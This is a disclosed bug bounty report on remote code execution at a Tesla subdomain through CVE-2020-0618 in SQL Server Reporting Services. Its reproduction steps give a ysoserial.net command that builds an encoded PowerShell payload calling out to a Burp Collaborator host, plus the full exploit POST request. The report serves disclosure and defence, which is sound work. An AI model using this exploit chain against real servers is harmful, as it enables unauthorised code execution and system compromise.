RCE on https://beta-partners.tesla.com due to CVE-2020-0618

Disclosed by
parzel
  • Program Tesla
  • Disclosed date about 4 years ago
  • Points 40
  • Priority P1 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by parzel

It was possible for an attacker to gain Remote Code Execution because of a vulnerable SQL Server Reporting Services (CVE-2020-0618)

Report details

  • Submitted

  • Target Location

    *.tesla.com

  • Target category

    Web App

  • VRT

    Server-Side Injection > Remote Code Execution (RCE)

  • Priority

    P1
  • Bug URL
    https://beta-partners.tesla.com/ReportServer/Pages/ReportViewer.aspx
  • Description

    Summary:

    Remote Code Execution on https://beta-partners.tesla.com due to vulnerable SQL Server Reporting Services (CVE-2020-0618).

    Impact:

    The impact is critical as the full system can be compromised with the attack.

    Reproduction:

    1) Download ysoserial.net to a windows system and unpack it to a folder (https://github.com/pwntester/ysoserial.net/releases/tag/v1.32)
    2) Generate a burp collaborator link or host your own webserver
    3) Generate your payload with the following snippet on the windows machine in the folder containing ysoserial.exe (replace the collaborator link with your link or your webserver):

    $command = 'Invoke-WebRequest -Uri https://l3pyrfttac5xvt9pe1vzxokv3m9cx1.burpcollaborator.net/POC'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

    Screenshot from 2020-02-15 21-55-50.png
    4) Insert the payload which was copied to your clipboard in the previous step into the attached POST request and run it against the server
    Screenshot from 2020-02-15 21-56-11.png
    5) A Tesla machine will try to download something from your collaborator. You can of course modify the payload to run any other powershell code, which enables arbitrary code execution
    Screenshot from 2020-02-15 21-56-21.png

    Mitigation:

    Update SQL Server Reporting Services to the February 2020 patch level to fix the issue.

    Reference:

    https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/

  • HTTP request 
    POST /ReportServer/Pages/ReportViewer.aspx HTTP/1.1
Host: beta-partners.tesla.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: BIGipServer~TG-DMZ-PROD-APPS~DMZ-ORIGIN-PROD-SUP-WF1-HTTP=1670455562.20480.0000
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 3429

NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PAYLOAD_HERE]&__VIEWSTATE=
Activity